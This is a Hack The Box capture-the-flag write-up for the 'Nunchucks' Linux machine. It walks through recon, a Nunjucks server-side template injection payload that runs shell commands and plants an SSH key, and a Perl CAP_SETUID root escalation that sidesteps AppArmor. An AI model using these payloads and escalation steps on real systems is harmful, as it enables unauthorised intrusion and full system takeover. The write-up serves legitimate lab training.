# Nunchucks - Easy ![Nunchucks](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F6QjYlD2t0PzeOBQFxRt6%2Fimage.png?alt=media\&token=1c7c983b-696f-4750-9970-7603516513d6) ## Introduction\@Nunchucks:\~$ | Name | [Nunchucks](https://app.hackthebox.com/machines/Nunchucks) | | ------------ | ---------------------------------------------------------- | | IP | 10.10.11.122 | | Points | 40 | | OS | Linux | | Difficulty | Easy | | Creator | [TheCyberGeek](https://app.hackthebox.com/users/114053) | | Release Date | 02 / Nov / 2021 | ## Recon ### Nmap ```bash ┌─[sheinn101@parrot]─[~/htb/nunchucks] └──╼ [??]$ cat nmap.out # Nmap 7.92 scan initiated Wed Nov 3 15:20:27 2021 as: nmap -sC -sV -oN nmap.out 10.10.11.122 Nmap scan report for 10.10.11.122 Host is up (0.42s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA) | 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA) |_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to https://nunchucks.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 443/tcp open ssl/http nginx 1.18.0 (Ubuntu) |_http-title: 400 The plain HTTP request was sent to HTTPS port |_http-trane-info: Problem with XML parsing of /evox/about | tls-nextprotoneg: |_ http/1.1 | ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK | Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb | Not valid before: 2021-08-30T15:42:24 |_Not valid after: 2031-08-28T15:42:24 | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Nov 3 15:21:19 2021 -- 1 IP address (1 host up) scanned in 52.42 seconds ``` Only 3 Ports are opened and we can see a DNS name `nunchucks.htb`. So add our `/etc/hosts` `echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts` ### Web ![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2Fjr1Z9JMPN3WsejH7jmXE%2Fimage.png?alt=media\&token=e8303d3a-44c3-4f00-b8b7-b4478fd896fa) I tried directory bruteforce but noting interesting. There is also a signup page which is currently closed. So noting much we can do. Let's find `vhosts` for this. ### Finding Vhosts ``` ┌─[sheinn101@parrot]─[~/htb/nunchucks] └──╼ [??]$ ffuf -u https://FUZZ.nunchucks.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : https://FUZZ.nunchucks.htb :: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 ________________________________________________ store [Status: 200, Size: 4029, Words: 1053, Lines: 102] ``` Found a subdomain called `store.nunchucks.htb` . Add this again to `/etc/hosts` If we go this domain, we can see another web page running `Express` which is `Javascript Framework.` ![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F3444Qn5NsJXEfqFfIvVn%2Fimage.png?alt=media\&token=74a7f8e1-3bfd-4495-8487-0db21061aab7) When we enter an email and click on `Notify Me` , It will reflected a message to us. ![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FDig8lFlk5XFIEN8OELtq%2Fimage.png?alt=media\&token=4c7dda58-0543-4935-a8ad-9153a7d9536b) So I tried `SSTI` like this. ![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FaZsLFBnZUP0BKk8gKEhj%2Fimage.png?alt=media\&token=4139e27e-57ba-4fc8-92b3-908305ff5f38) Now we can confirmed there is `Server Site Template Injection` . After wasting some times in google , I found a website that we can get `code execution` for `Nunchucks Template Engine`. > [Nunchucks](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine) Intercept with `Burp` and enter payload like this ``` {{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}@gmail.com ``` > Note: if you copy from original website, don't forget to esacpe double quote. ![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FuEF2rhxNzryuWSUPo44N%2Fimage.png?alt=media\&token=338d5a4a-0907-458b-a54e-0066481ad30c) Now we get the content of `/etc/passwd` . ## Getting User David I generate ssh-key with `ssh-keygen` in my localhost. ``` ┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh] └──╼ [??]$ ssh-keygen -f david Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in david Your public key has been saved in david.pub The key fingerprint is: SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot The key's randomart image is: +---[RSA 3072]----+ | ..o. | | . o. = | | o . . .=.o | |+. o . o.+. | |=E . o =S+ | |... . *oo.o | |o.. o B=o. | |.oo.o o B+.. | | +oo . .Bo | +----[SHA256]-----+ ``` Put it our ssh public key to `/home/david/.ssh/authorized_keys.` ``` {"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo "YOUR SSH PUBLIC KEY" > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"} ``` And then we can login with `ssh`. ``` ┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh] └──╼ [??]$ ssh -i david david@10.10.11.122 Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon 8 Nov 05:50:27 UTC 2021 System load: 0.0 Processes: 230 Usage of /: 48.8% of 6.82GB Users logged in: 0 Memory usage: 48% IPv4 address for ens160: 10.10.11.122 Swap usage: 0% 10 updates can be applied immediately. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6 david@nunchucks:~$ ls user.txt david@nunchucks:~$ cat user.txt d5beec8da1********65e4f46a2a6a david@nunchucks:~$ ``` ## Privilege Escalaption After some enumerating, there is some interesting file in `/opt` directory ``` david@nunchucks:/opt$ ls -al total 16 drwxr-xr-x 3 root root 4096 Oct 28 17:03 . drwxr-xr-x 19 root root 4096 Oct 28 17:03 .. -rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups david@nunchucks:/opt$ ``` > backup.pl ``` #!/usr/bin/perl use strict; use POSIX qw(strftime); use DBI; use POSIX qw(setuid); POSIX::setuid(0); my $tmpdir = "/tmp"; my $backup_main = '/var/www'; my $now = strftime("%Y-%m-%d-%s", localtime); my $tmpbdir = "$tmpdir/backup_$now"; sub printlog { print "[", strftime("%D %T", localtime), "] $_[0]\n"; } sub archive { printlog "Archiving..."; system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null"); printlog "Backup complete in $tmpbdir/backup_$now.tar"; } if ($> != 0) { die "You must run this script as root.\n"; } printlog "Backup starts."; mkdir($tmpbdir); &archive; printlog "Moving $tmpbdir/backup_$now to /opt/web_backups"; system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/"); printlog "Removing temporary directory"; rmdir($tmpbdir); printlog "Completed"; ``` This script is seem like to backup files into `web_backups` directory which is owned by root. It' s also using `POSIX::setuid(0);` to run as root but It must be SUID or capability. As a `linpeas` output ,we can see it has `CAP_SETUID.` {% hint style="info" %} CAP\_SETUID is granted to programs running as root or those running as a non-root user that have been explicitly given the CAP\_SETUID runtime capability.It is often preferable to use Linux runtime capabilities rather than file capabilities, since using file capabilities to run a program with elevated privileges opens up possible security holes since any user with access to the file can exec() that program to gain the elevated privileges. {% endhint %} ![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FKPVqBYHi3cpbUREQskI8%2Fimage.png?alt=media\&token=03e669f3-d9b1-498f-adb6-eeb2ef9beeaa) > You can also check wit this command : getcap -r / 2>/dev/null ### GTFObin ``` perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ``` I run this one line command from [GTFObin](https://gtfobins.github.io/gtfobins/perl/#capabilities) but it not worked.When we try to run `whoami` It will return as root, we can't even read `root.txt` , it said permission denied. ``` david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";' root david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "cat /root/root.txt";' cat: /root/root.txt: Permission denied david@nunchucks:/opt$ ``` But when we create this one line command into a script and run it. ```perl david@nunchucks:/tmp$ cat pwned.pl #!/usr/bin/perl use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash"; ``` ``` david@nunchucks:/tmp$ chmod +x pwned.pl david@nunchucks:/tmp$ ./pwned.pl root@nunchucks:/tmp# id uid=0(root) gid=1000(david) groups=1000(david) root@nunchucks:/tmp# cat /root/root.txt cf715d729***********b1aac2ebdd9e ``` Now we get a shell as root. > Note: But we can' execute like this. It said permission denied. ``` david@nunchucks:/tmp$ perl pwned.pl Can't open perl script "pwned.pl": Permission denied david@nunchucks:/tmp$ ``` This is weird. I tried to search on `Google` and I found an [Article](https://bugs.launchpad.net/apparmor/+bug/1911431) about this. If a script including the `shebang` of the restricted application is used, then the script will not be allocated the same restrictions and will be executed as shown in the link. Knowing that we can execute scripts with the shebang and they won't apply the AppArmor profile to the script. That's it. ![pwned](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FF8DJirSFlv1Un7WBmtvu%2Fcomplete.gif?alt=media\&token=045fd197-4004-49f4-a8ed-ee28e197008f) > Author Account :